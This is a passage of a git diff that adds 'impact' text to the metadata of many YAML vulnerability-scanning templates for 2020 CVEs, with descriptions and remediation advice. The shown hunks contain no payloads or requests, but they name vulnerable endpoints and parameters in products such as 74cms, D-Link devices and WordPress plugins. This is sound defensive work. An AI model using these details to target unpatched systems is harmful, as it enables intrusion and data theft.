-6,6 +6,8 @@ info: severity: critical description: | Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Gridx. reference: diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 806b6b7faf..6f2b1ad4ab 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 8af090779c..c9c69f7d72 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 4dd46fb321..7427955ef2 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index ca23cd55e7..9022e7533c 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index c1cfbcad26..06c5500544 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,ritikchaddha severity: critical description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index f9d1805d4b..c795525157 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 31aa6b5250..3acb0b9e3e 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0. reference: diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 8a063330c4..5e9e77c62d 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server. remediation: | Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index bdfaa3731c..a3f5ab8fd1 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 65a34b9dac..0a004745cb 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -5,6 +5,8 @@ info: author: j3ssie/geraldino2 severity: medium description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 7eb9054678..992f75f209 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. remediation: | Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 09c908ab34..016f813644 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file. reference: diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 217e04baed..260f54ebef 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. reference: diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index efff98cc7a..b810c304cc 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index a7f2e41d12..7e39ade64f 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can be exploited by attackers to trick users into visiting malicious websites, potentially leading to phishing attacks, malware infections, or unauthorized access to sensitive information. remediation: | Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840). reference: diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 11ef657d5d..cf6a863322 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the disclosure of sensitive information. remediation: | Upgrade OPNsense to a version higher than 20.1.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 4c8e227cbc..7c1a2b1fdf 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index ae373f2b32..fe8cfb89f7 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index bde9d3a077..93743500cd 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index e2f48aa54e..e98cf9ec71 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -7,6 +7,8 @@ info: description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website. remediation: | Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 27f69539a8..f262ef755d 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 995f9d2854..c5d81d8d85 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: critical description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server. + impact: | + Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site. remediation: | Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 6e44d5d758..928b9bfeb6 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index d0cd5918f6..28919168dd 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -6,6 +6,8 @@ info: severity: high description: | mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as database backups, configuration files, and other sensitive data. remediation: | Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index b37e74a5aa..3366326dd3 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index cc63c5916d..916442cfa1 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 5fe89d1bd5..d7f0c2c6a9 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. remediation: | Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7e9385f988..ef4edd1a2e 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 716d2d5624..7c04a98160 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -5,6 +5,8 @@ info: author: lethargynavigator severity: critical description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery. remediation: | Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch. reference: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 478c2ec415..85b52b1300 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 3be41411bd..9f0a7a9aba 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks. reference: diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 0a552be458..695f0c3204 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 5bad9c5f0a..78c4dd5414 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion. reference: diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 9cc5093afb..98f10a0a17 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. + impact: | + An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera. remediation: | Update the camera firmware to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index e7fed98189..96dcaa50b9 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -7,6 +7,8 @@ info: author: foulenzer severity: critical description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 8323f0fe08..40d55d0ebe 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system. remediation: | Apply the latest security patches provided by Sophos to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 28fd68342d..288df8d6ae 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts or steal sensitive information from users. remediation: | Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 7d40250e23..eb9df2b52a 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 5ad3b16b17..2f7a7a0593 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 56dc9b6062..21427c6031 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index dc4ee3cc0b..766223c83d 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: high description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. remediation: | Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 54a3bd603f..970c86ab5c 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application. remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. reference: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index d780b4f80d..e4a6000b99 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the affected system. remediation: | Apply the latest security patches provided by Cisco to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 6d435503d9..68837e9f71 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-26214.yaml 